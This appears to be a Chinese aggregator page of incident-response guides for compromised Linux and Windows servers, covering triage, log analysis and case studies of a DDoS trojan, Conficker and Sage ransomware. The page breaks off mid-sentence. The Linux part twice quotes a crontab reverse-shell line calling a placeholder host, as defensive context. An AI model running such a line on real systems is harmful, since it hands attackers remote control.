精华内容
下载资源
问答
  • 网络应急预案流程图

    2012-09-20 16:16:18
    网络应急预案流程图,综合许多应急预案资料以及各个行业的应急流程图,并且根据信息系统自身的特点,特绘制此流程图。
  • 网络与信息安全类突发事件应急联动流程图.pdf
  • 网络与信息安全类突发事件应急联动流程图 网络与信息安全类突发事件包括 利用校园网络发送有害信 息进行反动色情迷信等宣传活动窃取国家及教育行政部 门学院保密信息可能造成严重后果的事件各种破坏校园网 络安全...
  • 网络与信息安全类突发事件应急联动流程图 网络与信息安全类突发事件包括利用校园网络发送有害信息进行反动色情迷信等宣传活动窃取国家及教育行政部门学院保密信息可能造成严重后果的事件各种破坏校园网络安全运行的...
  • 网络安全应急响应流程

    千次阅读 2019-12-05 18:28:10
    网络安全应急响应流程 国家网信办6月27日印发《国家网络安全事件应急预案》(下称《预案》),包括勒索病毒在内的有害程序事件被明确为网络安全事件的种类之一,针对事件的监测预警、应急处置、调查评估均设置了具体...

    网络安全应急响应流程

    国家网信办6月27日印发《国家网络安全事件应急预案》(下称《预案》),包括勒索病毒在内的有害程序事件被明确为网络安全事件的种类之一,针对事件的监测预警、应急处置、调查评估均设置了具体机制。

    网络安全应急响应流程

    据了解,《预案》确定了在中央网信领导小组领导下,中央网信办、工信部、公安部、国家保密局等部门分工负责的领导机制,必要时成立国家网络安全事件应急指挥部。此外,《预案》还规定了中央和国家机关各部门、各省级网信部门的职责。

    网络安全应急响应是十分重要的,在网络安全事件层出不穷、事件危害损失巨大的时代,应对短时间内冒出的网络安全事件,根据应急响应组织事先对各自可能情况的准备演练,在网络安全事件发生后,尽可能快速、高效的跟踪、处置与防范,确保网络信息安全。就目前的网络安全应急监测体系来说,其应急处理工作可分为以下几个流程:

    01准备工作

    此阶段以预防为主,在事件真正发生前为应急响应做好准备。主要包括以下几项内容:

    制定用于应急响应工作流程的文档计划,并建立一组基于威胁态势的合理防御措施;

    制定预警与报警的方式流程,建立一组尽可能高效的事件处理程序;

    建立备份的体系和流程,按照相关网络安全政策配置安全设备和软件;

    建立一个支持事件响应活动的基础设施,获得处理问题必备的资源和人员,进行相关的安全培训,可以进行应急反映事件处理的预演方案;

    网络安全应急响应流程

    02事件监测

    识别和发现各种网络安全紧急事件。一旦被入侵检测机制或另外可信的站点警告已经检侧到了入侵,需要确定系统和数据被入侵到了什么程度。入侵响应需要管理层批准,需要决定是否关闭被破坏的系统及是否继续业务,是否继续收集入侵者活动数据(包括保护这些活动的相关证据)。通报信息的数据和类型,通知什么人。主要包括以下几种处理方法:

    布局入侵检测设备、全局预警系统,确定网络异常情况;

    预估事件的范围和影响的严重程度,来决定启动相应的应急响应的方案;

    事件的风险危害有多大,涉及到多少网络,影响了多少主机,情况危急程度;

    确定事件责任人人选,即指定一个责任人全权处理此事件并给予必要资源;

    攻击者利用的漏洞传播的范围有多大,通过汇总,确定是否发生了全网的大规模入侵事件;

    网络安全应急响应流程

    03抑制处置

    在入侵检测系统检测到有安全事件发生之后,抑制的目的在于限制攻击范围,限制潜在的损失与破坏,在事件被抑制以后,应该找出事件根源并彻底根除;然后就该着手系统恢复,把所有受侵害的系统、应用、数据库等恢复到它们正常的任务状态。

    收集入侵相关的所有资料,收集并保护证据,保证安全地获取并且保存证据;

    确定使系统恢复正常的需求和时间表、从可信的备份介质中恢复用户数据和应用服务;

    通过对有关恶意代码或行为的分析结果,找出事件根源明确相应的补救措施并彻底清除,并对攻击源进行准确定位并采取措施将其中断;

    清理系统、恢复数据、程序、服务,把所有被攻破的系统和网络设备彻底还原到正常的任务状态。

    04应急场景

    网络攻击事件

    安全扫描攻击:黑客利用扫描器对目标进行漏洞探测,并在发现漏洞后进一步利用漏洞进行攻击;

    暴力破解攻击:对目标系统账号密码进行暴力破解,获取后台管理员权限;

    系统漏洞攻击:利用操作系统、应用系统中存在漏洞进行攻击;

    WEB漏洞攻击:通过SQL注入漏洞、上传漏洞、XSS漏洞、授权绕过等各种WEB漏洞进行攻击;

    拒绝服务攻击:通过大流量DDOS或者CC攻击目标,使目标服务器无法提供正常服务;

    其他网络攻击行为;

    恶意程序事件

    病毒、蠕虫:造成系统缓慢,数据损坏、运行异常;

    远控木马:主机被黑客远程控制;

    僵尸网络程序(肉鸡行为):主机对外发动DDOS攻击、对外发起扫描攻击行为;

    挖矿程序:造成系统资源大量消耗;

    WEB恶意代码

    Webshell后门:黑客通过Webshell控制主机;

    网页挂马:页面被植入待病毒内容,影响访问者安全;

    网页暗链:网站被植入博彩、色情、游戏等广告内容;

    信息破坏事件

    系统配置遭篡改:系统中出现异常的服务、进程、启动项、账号等等;

    数据库内容篡改:业务数据遭到恶意篡改,引起业务异常和损失;

    网站内容篡改事件:网站页面内容被黑客恶意篡改;

    信息数据泄露事件:服务器数据、会员账号遭到窃取并泄露;

    其他安全事件

    账号被异常登录:系统账号在异地登录,可能出现账号密码泄露;

    异常网络连接:服务器发起对外的异常访问,连接到木马主控端、矿池、病毒服务器等行为;

    总之,信息安全应急响应体系应该从以上几个方面来更加完善,统一规范事件报告格式,建立及时堆确的安全事件上报体系,在分类的基础上,进一步研究针对各类安全事件的响应对策,从而建立一个应急决策专家系统,建立网络安全事件数据库,这项工作对于事件应急响应处置过程具有十分重要的意义

    展开全文
  • WORD格式 可编辑 WORD格式 可编辑 专业知识 整理分享 专业知识 整理分享 海门市人民医院 信息系统网络故障应急处理预案及流程 一 总则 为确保医院信息系统的安全运行医院医疗保险电脑结算系统在出现故障时 能保证...
  •  服务器安全应急响应流程分为发现安全事件(核实)、现场保护、服务器保护、影响范围评估、在线分析、数据备份、深入分析、事件报告整理等8个环节。接下来我们将每个环节分解,看看需要如何断开异常连接、排查入侵...

     

    参考: https://mp.weixin.qq.com/s?__biz=MzI4NTA1MDEwNg==&mid=2650759483&idx=1&sn=c98277d4f9eb252409a177756b222b8a&chksm=f3f9d4aec48e5db85e07e998cc7052eeac3165f549e4f43dc0fa0789c3d3da006dac3c4135bb&scene=0#rd

     

    1. 服务器安全应急响应流程

           服务器安全应急响应流程分为发现安全事件(核实)、现场保护、服务器保护、影响范围评估、在线分析、数据备份、深入分析、事件报告整理等8个环节。接下来我们将每个环节分解,看看需要如何断开异常连接、排查入侵源头、避免二次入侵等。

     

    一、核实信息(运维/安全人员)

     根据安全事件通知源的不同,分为两种:

    1. 外界通知: 和报告人核实信息,确认服务器/系统是否被入侵。 现在很多企业有自己的SRC(安全响应中心),在此之前更多的是依赖某云。 这种情况下入侵的核实一般是安全工程师完成。 

    2. 自行发现: 根据服务器的异常或故障判断, 比如对外发送大规模流量或者系统负载异常高等,这种情况一般是运维工程师发现并核实的。 

     

    二、现场保护(运维)

     我们很多人看过大陆的电视剧《重案六组》,每次接到刑事案件,刑警们第一时间就是封锁现场,保存现场原状。同样道理,安全事件发生现场,跟刑事案件发生现场一样,需要保存第一现场重要信息,方便后面入侵检测和取证。 

    1. 保存现场环境(截图)

    相关信息采集命令如下:

    进程信息:ps axu

    网络信息:netstat –a

    网络+进程:lsof / netstat -p

    2. 攻击者登陆情况(截图)

    相关信息采集命令如下:

    查看当前登录用户:w 或 who -a

     

    三、服务器保护(运维/机房)

     现场保护和服务器保护,是两个不同的环节。 前者注重取证,后者注重环境隔离。 

    核实机器被入侵后,应当尽快将机器保护起来,避免被二次入侵或者当成跳板扩大攻击面。 

    此时,为保护服务器和业务, 避免服务器被攻击者继续利用, 应尽快迁移业务, 立即下线机器。 

    如果不能立即处理,应当通过配置网络ACL等方式,封掉该服务器对网络的双向连接。 

     

    四、影响范围评估(运维/开发)

           一般是运维或者程序确认影响范围,需要运维通过日志或者监控图表确认数据库或者敏感文件是否泄露,如果是代码或者数据库泄露了,则需要程序评估危害情况与处置方法。

     

    影响访问评估一般从下面几点入手来:

     

    • 具体业务架构:web(php/java, webserver), proxy, db等。

    • IP及所处区域拓扑等:VLAN 内服务器和应用情况;

    • 确定同一网络下面服务器之间的访问:可以互相登陆,是否需要 key 或者是密码登录。

     

    由此确定检查影响范围,确认所有受到影响的网段和机器。

     

    五、在线分析(安全人员/运维)

            这时需要根据个人经验快速在线分析,一般是安全人员和运维同时在线处理,不过会涉及多人协作的问题,需要避免多人操作机器时破坏服务器现场,造成分析困扰,之前笔者遇到一个类似的问题,就是运维排查时敲错了iptables的命令,将 iptables -L 敲成 iptables -i 导致 iptables-save 时出现异常记录,结果安全人员上来检查时就被这条记录迷惑了,导致处理思路受到一定干扰。

     

    1. 所有用户History日志检测

     

    • 关键字:wget/curl, gcc, 或者隐藏文件, 敏感文件后缀(.c,.py,conf, .pl, .sh);

    • 检查是否存在异常用户;

    • 检查最近添加的用户,是否有不知名用户或不规范提权;

    • 找出root权限的用户;

     

    可以执行以下命令检查:

           $ grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'

     

    反连木马判断

     

    • netstat -a;

    • 注意非正常端口的外网IP;

     

    3、可疑进程判断

     

    • 判断是否为木马    ps -aux

    • 重点关注文件(隐藏文件), python 脚本,perl 脚本,shell 脚本(bash/sh/zsh);

    • 使用which,whereis,find定

    4. Crontab检测

           不要用 crontab -l 查看crontab(绕过检测),也有通过写 crontab 配置文件反弹shell的,笔者接触过几次,一般都是使用的 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

     

    5. 系统日志检测

    • 检查sshd服务配置文件/etc/ssh/sshd_config和系统认证日志auth、message,判断是否为口令破解攻击;

    • /etc/ssh/sshd_config文件确认认证方式;

    • 确认日志是否被删除或者清理过的可能(大小判断);

    • last/lastb可以作为辅助,不过可能不准确;

     

    6. NHIDS正常运行判断

    • 是否安装:ls /etc/ossec

    • 是否运行正常:ps axu | grep nhids  三个nhids进程则表示正常

    7. 其他攻击分析

     

    抓取网络数据包并进行分析,判断是否为拒绝服务攻击,这里需要注意,一定要使用 -w 参数,这样才能保存成 pcap 格式导入到 wireshark,这样分析起来会事半功倍。

            $  tcpdump -w tcpdump.log

     

     

    六、安全相关的关键文件和数据备份(运维)

     

    可以同步进行,使用sftp/rsync等将日志上传到安全的服务器。

    1. 打包系统日志

      参考:$ tar -jcvf syslog.tar.bz2 /var/log

    2. 打包 web 日志:access log

    3. 打包 history 日志(所有用户),参考:

      $ cp /home/user/.history user_history

    4. 打包 crontab 记录

    5. 打包密码文件:/etc/passwd, /etc/shadow

    6. 打包可疑文件、后门、shell信息

     

    七、深入分析(安全人员

     

          初步锁定异常进程和恶意代码后,将受影响范围梳理清楚,封禁了入侵者对机器的控制后,接下来需要深入排查入侵原因。一般可以从webshell、开放端口服务等方向顺藤摸瓜。

     

     

    1、Webshell入侵

      • 使用 webshell_check.py 脚本检测web目录;

        $ python webshell_check.py /var/www/ >result.txt

      • 查找 web 目录下所有 nobody 的文件,人工分析:

        $ find /var/www -user nobody > nobody.txt

      • 如果能确定入侵时间,可以使用find查找最近时间段内变化的文件;

        $ find / -type f -name "\.?*" |xargs ls -l |grep "Mar 22"

        $ find / -ctime/-mtime 8

    2、利用Web漏洞直接反连shell

     

    分析access.log

     

    • 缩小日志范围:时间,异常IP提取

    • 攻击行为提取:常见的攻击exp识别

     

    3、系统弱口令入侵

     

    认证相关日志auth/syslog/message排查:

     

    • 爆破行为定位和IP提取;

    • 爆破是否成功确定:有爆破行为IP是否有accept记录。

     

    如果日志已经被清理,使用工具(比如John the Ripper)爆破/etc/passwd,/etc/shadow。

     

    4、其他入侵

     

    其他服务器跳板到本机。

     

    5、后续行为分析

     

    • History日志:提权、增加后门,以及是否被清理。

    • Sniffer: 网卡混杂模式检测  ifconfig |grep –i proc

    • 内网扫描:网络nmap/扫描器,socks5代理

    • 确定是否有rootkit:rkhunter, chkrootkit, ps/netstat替换确认

     

    6、后门清理排查

     

    • 根据时间点做关联分析:查找那个时间段的所有文件;

    • 一些小技巧:/tmp目录, ls –la,查看所有文件,注意隐藏的文件;

    • 根据用户做时间关联:比如nobody;

     

    7、其他机器的关联操作

     

    其他机器和这台机器的网络连接 (日志查看)、相同业务情况(同样业务,负载均衡)。

     

    八、整理事件报告(安全人员)

     

    事件报告应包含但不限于以下几个点:

     

    • 分析事件发生原因:事件为什么会发生的原因;

    • 分析整个攻击流程:时间点、操作;

    • 分析事件处理过程:整个事件处理过程总结是否有不足;

    • 分析事件预防:如何避免事情再次发生;

    • 总结:总结事件原因,改进处理过程,预防类似事件再次发生。

     

    九、处理中的遇到的比较棘手的事情

     

    日志和操作记录全被删了怎么办?

     

    strace 查看 losf 进程,再尝试恢复一下日志记录,不行的话镜像硬盘数据慢慢查。这个要用到一些取证工具了,dd硬盘数据再去还原出来。

     

    系统账号密码都修改了,登不进去?

     

    重启进单用户模式修改root密码,或者通过控制卡操作,或者直接还原系统。都搞不定就直接重装吧。

     

    使用常见的入侵检测命令未发现异常进程,但是机器在对外发包,这是怎么回事?

     

    这种情况下很可能常用的系统命令已经被攻击者或者木马程序替换,可以通过md5sum对比本机二进制文件与正常机器的md5值是否一致,如果发现不一致,肯定是被替换了,可以从其他机器上拷贝命令到本机替换,或者alias为其他名称,避免为恶意程序再次替换。

     

    被getshell怎么办?

     

    • 漏洞修复前,系统立即下线,用内网环境访问。

    • 上传点放到内网访问,不允许外网有类似的上传点,有上传点,而且没有校验文件类型很容易上传webshell。

    • 被getshell的服务器中是否有敏感文件和数据库,如果有请检查是否有泄漏。

    • hosts文件中对应的host关系需要重新配置,攻击者可以配置hosts来访问测试环境。

    • 重装系统。

     

    案例分析

     

    上面讲了很多思路的东西,相信大家更想看看实际案例,下面介绍两个案例。

     

    先讲一个别人处理的,基本处理过程就是:

     

    通过外部端口扫描收集开放端口信息,然后获取到反弹shell信息,登陆机器发现关键命令已经被替换,后面查看history记录,发现疑似木马文件,通过简单逆向和进程查看发现了异常进程,从而锁定了入侵原因。具体内容可以查看:http://www.freebuf.com/articles/system/50728.html

     

    再讲一个笔者实际处理过的,基本处理流程跟上面提到的思路大同小异。

     

    整个事情处理经过大致如下:

     

    1、运维发现一台私有云主机间歇性的对外发送高达800Mbps的流量,影响了同一个网段的其他机器。

     

    2、安全人员接到通知后,先确认了机器属于备机,没有跑在线业务,于是通知运维封禁iptables限制外网访问。

     

    3、运维为安全人员临时开通机器权限,安全人员通过history和ps找到的入侵记录和异常进程锁定了对外大量发包的应用程序,清理了恶意进程并删除恶意程序。

     

    恶意进程如下,经过在网络搜索发现是一种DDOS木马,但没有明确的处理思路:

     

    /usr/bin/bsd-port/getty/usr/bin/acpid./dbuspm-session /sbin/DDosClient RunByP4407/sbin/DDosClient RunByPM4673

     

    处理过程中,安全人员怀疑系统文件被替换:

     

    通过对比该机器与正常机器上面的ps、netstat等程序的大小发现敏感程序已经被替换,而且mtime也被修改。

     

    正常机器

    du -sh /bin/ps

    92K /bin/ps

    du -sh /bin/netstat

    120K    /bin/netstat

     

    被入侵机器

    du -sh /bin/netstat

    2.0M    /bin/netstat

    du -sh /bin/ps

    2.0M    /bin/ps

     

    将部分常用二进制文件修复后,发现异常进程被kill掉后仍重启了,于是安装杀毒软件clamav和rootkit hunter进行全盘扫描,从而确认了被感染的所有文件,将那些可以删除的文件删除后再次kill掉异常进程,则再没有重启的问题。

     

    4、影响范围评估

     

    由于该机器只是备机,上面没有敏感数据,于是信息泄露问题也就不存在了。

     

    扫描同一网段机器端口开放情况、排查被入侵机器history是否有对外扫描或者入侵行为,为此还在该网段机器另外部署蜜罐进行监控。

     

    5、深入分析入侵原因

     

    通过被入侵机器所跑服务、iptables状态,确认是所跑服务支持远程命令执行,且机器iptables为空导致黑客通过往/etc/crontab中写“bash -i >& /dev/tcp/10.0.0.1/8080 0>&1”命令方式进行shell反弹,从而入侵了机器。

     

    6、验证修复、机器下线重装

     

    进行以上修复操作后,监控未发现再有异常,于是将机器下线重装。

     

    7、完成安全事件处理报告

     

    每次安全事件处理后,都应当整理成报告,不管是知识库的构建,还是统计分析安全态势,都是很有必要的。

     

    这次主要介绍了服务器被入侵时推荐的一套处理思路。实际上,安全防护跟运维思路一样,都是要防患于未然,这时候的审计或者响应其实很难避免危害的发生了,我们更希望通过安全意识教育、安全制度的建设,在问题显露端倪时即可消弭于无形。

    转载于:https://www.cnblogs.com/toughlife/p/9781247.html

    展开全文
  • 附件1网络与信息安全应急处置组织架构图 线路维护...网络与信息安全应急处置组 附件2网络与信息安全应急响应流程图 级事件 应急领导小组 上报网络与信息 安全应急领导小组 有关网络与信息 安全事件发生 应急小组 分析研
  • 附件1网络与信息安全应急处置组织架构图 线路维护...网络与信息安全应急处置组 附件2网络与信息安全应急响应流程图 级事件 应急领导小组 上报网络与信息 安全应急领导小组 有关网络与信息 安全事件发生 应急小组 分析研
  • 附件 1网络与信息安全应急处置组织架构图 网络与信息安全应急领导小组 网络与信息...维 维 急 急 安 单 单 护 护 护 支 支 全 位 位 单 单 单 援 援 厂 位 位 位 小 小 商 组 组 附件 2 网络与信息安全应急响应流程图
  • Windows 应急流程及实战演练 当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,...
    	当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为企业挽回或减少经济损失。  
    

    常见的应急响应事件分类:

    web 入侵:网页挂马、主页篡改、Webshell
    系统入侵:病毒木马、勒索软件、远控后门
    网络攻击:DDOS 攻击、DNS 劫持、ARP 欺骗

    针对常见的攻击事件,结合工作中应急响应事件分析和解决的方法,总结了一些 Window 服务器入侵排查的思路。

    0x01 入侵排查思路

    一、检查系统账号安全

    1、查看服务器是否有弱口令,远程管理端口是否对公网开放。

    检查方法:

    据实际情况咨询相关服务器管理员。

    2、查看服务器是否存在可疑账号、新增账号。

    检查方法:

    打开 cmd 窗口,输入lusrmgr.msc命令,查看是否有新增/可疑的账号,如有管理员群组的(Administrators)里的新增账户,如有,请立即禁用或删除掉。
    3、查看服务器是否存在隐藏账号、克隆账号。

    检查方法:

    a、打开注册表 ,查看管理员对应键值。
    b、使用 D 盾 _web 查杀工具,集成了对克隆账号检测的功能。在这里插入图片描述
    4、结合日志,查看管理员登录时间、用户名是否存在异常。

    检查方法:

    a、Win+R 打开运行,输入“eventvwr.msc”,回车运行,打开“事件查看器”。
    b、导出 Windows 日志–安全,利用 Log Parser 进行分析。
    在这里插入图片描述
    二、检查异常端口、进程

    1、检查端口连接情况,是否有远程连接、可疑连接。

    检查方法:

    a、netstat -ano 查看目前的网络连接,定位可疑的 ESTABLISHED
    b、根据 netstat 定位出的 pid,再通过 tasklist 命令进行进程定位 tasklist | findstr “PID”

    2、进程

    检查方法:

    a、开始–运行–输入 msinfo32,依次点击“软件环境→正在运行任务”就可以查看到进程的详细信息,比如进程路径、进程 ID、文件创建日期、启动时间等。
    b、打开 D 盾 _web 查杀工具,进程查看,关注没有签名信息的进程。
    c、通过微软官方提供的 Process Explorer 等工具进行排查 。
    d、查看可疑的进程及其子进程。可以通过观察以下内容:
    没有签名验证信息的进程
    没有描述信息的进程
    进程的属主
    进程的路径是否合法
    CPU 或内存资源占用长时间过高的进程

    3、小技巧:

    a、查看端口对应的 PID: netstat -ano | findstr “port”
    b、查看进程对应的 PID:任务管理器–查看–选择列–PID 或者 tasklist | findstr “PID”
    c、查看进程对应的程序位置:
    任务管理器–选择对应进程–右键打开文件位置
    运行输入 wmic,cmd界面 输入 process
    d、tasklist /svc 进程-- PID --服务
    e、查看 Windows 服务所对应的端口:
    %system%/system32/drivers/etc/services(一般 %system%就是 C:Windows)

    三、检查启动项、计划任务、服务

    1、检查服务器是否有异常的启动项。

    检查方法:

    a、登录服务器,单击【开始】>【所有程序】>【启动】,默认情况下此目录在是一个空目录,确认是否有非业务程序在该目录下。
    b、单击开始菜单 >【运行】,输入 msconfig,查看是否存在命名异常的启动项目,是则取消勾选命名异常的启动项目,并到命令中显示的路径删除文件。
    c、单击【开始】>【运行】,输入 regedit,打开注册表,查看开机启动项是否正常,特别注意如下三个注册表项:
    HKEY_CURRENT_USERsoftwaremicorsoftwindowscurrentversionrun
    HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun
    HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunonce
    检查右侧是否有启动异常的项目,如有请删除,并建议安装杀毒软件进行病毒查杀,清除残留病毒或木马。
    d、利用安全软件查看启动项、开机时间管理等。
    e、组策略,运行 gpedit.msc。

    2、检查计划任务

    检查方法:

    a、单击【开始】>【设置】>【控制面板】>【任务计划】,查看计划任务属性,便可以发现木马文件的路径。
    b、单击【开始】>【运行】;输入 cmd,然后输入at,检查计算机与网络上的其它计算机之间的会话或计划任务,如有,则确认是否为正常连接。

    3、服务自启动

    检查方法:

    单击【开始】>【运行】,输入 services.msc,注意服务状态和启动类型,检查是否有异常服务。

    四、检查系统相关信息

    1、查看系统版本以及补丁信息

    检查方法:

    单击【开始】>【运行】,输入 systeminfo,查看系统信息

    2、查找可疑目录及文件

    检查方法:

    a、 查看用户目录,新建账号会在这个目录生成一个用户目录,查看是否有新建用户目录。
    Window 2003 :C:Documents and Settings
    Window 2008R2 :C:Users
    b、单击【开始】>【运行】,输入 %UserProfile%Recent,分析最近打开分析可疑文件。
    c、在服务器各个目录,可根据文件夹内文件列表时间进行排序,查找可疑文件。

    五、自动化查杀

    病毒查杀

    检查方法:

    下载安全软件,更新最新病毒库,进行全盘扫描。

    webshell 查杀

    检查方法:

    选择具体站点路径进行 webshell 查杀,建议使用两款 webshell 查杀工具同时查杀,可相互补充规则库的不足。

    六、日志分析

    系统日志

    分析方法:

    a、前提:开启审核策略,若日后系统出现故障、安全事故则可以查看系统的日志文件,排除故障,追查入侵者的信息等。

    b、Win+R 打开运行,输入“eventvwr.msc”,回车运行,打开“事件查看器”。

    C、导出应用程序日志、安全日志、系统日志,利用 Log Parser 进行分析。

    WEB 访问日志

    分析方法:

    a、找到中间件的 web 日志,打包到本地方便进行分析。

    b、推荐工具:

    Window 下,推荐用 EmEditor 进行日志分析,支持大文本,搜索效率还不错。

    Linux 下,使用 Shell 命令组合查询分析

    0x02 工具篇

    病毒分析 :

    PCHunter:http://www.xuetr.com

    火绒剑:https://www.huorong.cn

    Process Explorer:https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer

    processhacker:https://processhacker.sourceforge.io/downloads.php

    autoruns:https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

    OTL:https://www.bleepingcomputer.com/download/otl/

    病毒查杀:

    卡巴斯基(推荐理由:绿色版、最新病毒库):http://devbuilds.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe

    大蜘蛛(推荐理由:扫描快、一次下载只能用1周,更新病毒库):http://free.drweb.ru/download+cureit+free

    火绒安全软件:https://www.huorong.cn

    360杀毒:http://sd.360.cn/download_center.html

    病毒动态:

    CVERC-国家计算机病毒应急处理中心:http://www.cverc.org.cn

    微步在线威胁情报社区:https://x.threatbook.cn

    火绒安全论坛:http://bbs.huorong.cn/forum-59-1.html

    爱毒霸社区:http://bbs.duba.net

    腾讯电脑管家:http://bbs.guanjia.qq.com/forum-2-1.html

    在线病毒扫描网站:

    多引擎在线病毒扫描网 v1.02,当前支持 41 款杀毒引擎:http://www.virscan.org

    腾讯哈勃分析系统:https://habo.qq.com

    Jotti 恶意软件扫描系统:https://virusscan.jotti.org

    针对计算机病毒、手机病毒、可疑文件等进行检测分析:http://www.scanvir.com

    webshell 查杀:

    D盾_Web查杀:http://www.d99net.net/index.asp

    河马 webshell 查杀:http://www.shellpub.com

    深信服 Webshell 网站后门检测工具:http://edr.sangfor.com.cn/backdoor_detection.html

    Safe3:http://www.uusec.com/webshell.zip

    0x03 应急响应实战之 FTP 暴力破解

    FTP 是一个文件传输协议,用户通过 FTP 可从客户机程序向远程主机上传或下载文件,常用于网站代码维护、日常源码备份等。如果攻击者通过 FTP 匿名访问或者弱口令获取FTP权限,可直接上传 webshell,进一步渗透提权,直至控制整个网站服务器。

    应急场景

    从昨天开始,网站响应速度变得缓慢,网站服务器登录上去非常卡,重启服务器就能保证一段时间的正常访问,网站响应状态时而飞快时而缓慢,多数时间是缓慢的。针对网站服务器异常,系统日志和网站日志,是我们排查处理的重点。查看 Window 安全日志,发现大量的登录失败记录:
    在这里插入图片描述
    日志分析

    安全日志分析:
    安全日志记录着事件审计信息,包括用户验证(登录、远程访问等)和特定用户在认证后对系统做了什么。
    打开安全日志,在右边点击筛选当前日志, 在事件 ID 填入 4625,查询到事件 ID4625,事件数 177007,从这个数据可以看出,服务器正则遭受暴力破解:
    在这里插入图片描述
    进一步使用 Log Parser 对日志提取数据分析,发现攻击者使用了大量的用户名进行爆破,例如用户名:fxxx,共计进行了 17826 次口令尝试,攻击者基于“fxxx”这样一个域名信息,构造了一系列的用户名字典进行有针对性进行爆破,如下图:
    在这里插入图片描述
    这里我们留意到登录类型为 8,来了解一下登录类型8是什么意思呢?

    登录类型 8:网络明文(NetworkCleartext)

    这种登录表明这是一个像类型3一样的网络登录,但是这种登录的密码在网络上是通过明文传输的,WindowsServer 服务是不允许通过明文验证连接到共享文件夹或打印机的,据我所知只有当从一个使用 Advapi 的 ASP 脚本登录或者一个用户使用基本验证方式登录IIS才会是这种登录类型。“登录过程”栏都将列出 Advapi。

    我们推测可能是 FTP 服务,通过查看端口服务及管理员访谈,确认服务器确实对公网开放了 FTP 服务。
    在这里插入图片描述
    另外,日志并未记录暴力破解的 IP 地址,我们可以使用 Wireshark 对捕获到的流量进行分析,获取到正在进行爆破的 IP:
    在这里插入图片描述
    通过对近段时间的管理员登录日志进行分析,如下:
    在这里插入图片描述
    管理员登录正常,并未发现异常登录时间和异常登录 ip,这里的登录类型 10,代表远程管理桌面登录。
    在这里插入图片描述
    另外,通过查看 FTP 站点,发现只有一个测试文件,与站点目录并不在同一个目录下面,进一步验证了 FTP 暴力破解并未成功。

    应急处理措施:

    1、关闭外网FTP端口映射

    2、删除本地服务器FTP测试

    处理措施

    FTP 暴力破解依然十分普遍,如何保护服务器不受暴力破解攻击,总结了几种措施:

    1、禁止使用FTP传输文件,若必须开放应限定管理IP地址并加强口令安全审计(口令长度不低于8位,由数字、大小写字母、特殊字符等至少两种以上组合构成)。

    2、更改服务器 FTP 默认端口。

    3、部署入侵检测设备,增强安全防护。

    0x04 应急响应实战之蠕虫病毒

    蠕虫病毒是一种十分古老的计算机病毒,它是一种自包含的程序(或是一套程序),通常通过网络途径传播,每入侵到一台新的计算机,它就在这台计算机上复制自己,并自动执行它自身的程序。

    常见的蠕虫病毒:熊猫烧香病毒 、冲击波/震荡波病毒、conficker 病毒等。

    应急场景

    某天早上,管理员在出口防火墙发现内网服务器不断向境外IP发起主动连接,内网环境,无法连通外网,无图脑补。

    事件分析

    在出口防火墙看到的服务器内网 IP,首先将中病毒的主机从内网断开,然后登录该服务器,打开 D 盾_web 查杀查看端口连接情况,可以发现本地向外网 IP 发起大量的主动连接:
    在这里插入图片描述
    通过端口异常,跟踪进程 ID,可以找到该异常由 svchost.exe windows 服务主进程引起,svchost.exe 向大量远程 IP 的 445 端口发送请求:
    在这里插入图片描述这里我们推测可以系统进程被病毒感染,使用卡巴斯基病毒查杀工具,对全盘文件进行查杀,发现 c:windowssystem32qntofmhz.dll 异常:
    在这里插入图片描述
    使用多引擎在线病毒扫描对该文件进行扫描:http://www.virscan.org/
    在这里插入图片描述
    确认服务器感染 conficker 蠕虫病毒,下载 conficker 蠕虫专杀工具对服务器进行清查,成功清楚病毒。

    大致的处理流程如下:

    1、发现异常:出口防火墙、本地端口连接情况,主动向外网发起大量连接

    2、病毒查杀:卡巴斯基全盘扫描,发现异常文件

    3、确认病毒:使用多引擎在线病毒对该文件扫描,确认服务器感染 conficker 蠕虫病毒。

    4、病毒处理:使用 conficker 蠕虫专杀工具对服务器进行清查,成功清除病毒。
    在这里插入图片描述
    预防处理措施

    在政府、医院内网,依然存在着一些很古老的感染性病毒,如何保护电脑不受病毒感染,总结了几种预防措施:

    1、安装杀毒软件,定期全盘扫描

    2、不使用来历不明的软件,不随意接入未经查杀的 U 盘

    3、定期对 windows 系统漏洞进行修复,不给病毒可乘之机

    4、做好重要文件的备份,备份,备份。

    0x05 应急响应实战之勒索病毒

    勒索病毒,是一种新型电脑病毒,主要以邮件、程序木马、网页挂马的形式进行传播。该病毒性质恶劣、危害极大,一旦感染将给用户带来无法估量的损失。这种病毒利用各种加密算法对文件进行加密,被感染者一般无法解密,必须拿到解密的私钥才有可能破解。自 WannaCry 勒索病毒在全球爆发之后,各种变种及新型勒索病毒层出不穷。

    应急场景

    某天早上,网站管理员打开 OA 系统,首页访问异常,显示乱码:
    在这里插入图片描述
    事件分析

    登录网站服务器进行排查,在站点目录下发现所有的脚本文件及附件都被加密为 .sage 结尾的文件,每个文件夹下都有一个 !HELP_SOS.hta 文件,打包了部分样本:
    在这里插入图片描述打开 !HELP_SOS.hta 文件,显示如下:
    在这里插入图片描述
    到这里,基本可以确认是服务器中了勒索病毒,上传样本到 360 勒索病毒网站进行分析:

    http://lesuobingdu.360.cn

    确认 web 服务器中了 sage 勒索病毒,目前暂时无法解密。
    在这里插入图片描述绝大多数勒索病毒,是无法解密的,一旦被加密,即使支付也不一定能够获得解密密钥。在平时运维中应积极做好备份工作,数据库与源码分离(类似 OA 系统附件资源也很重要,也要备份)。

    遇到了,别急,试一试勒索病毒解密工具:

    “拒绝勒索软件”网站:

    https://www.nomoreransom.org/zh/index.html

    360 安全卫士勒索病毒专题:

    http://lesuobingdu.360.cn

    防范措施

    一旦中了勒索病毒,文件会被锁死,没有办法正常访问了,这时候,会给你带来极大的困恼。为了防范这样的事情出现,我们电脑上要先做好一些措施:

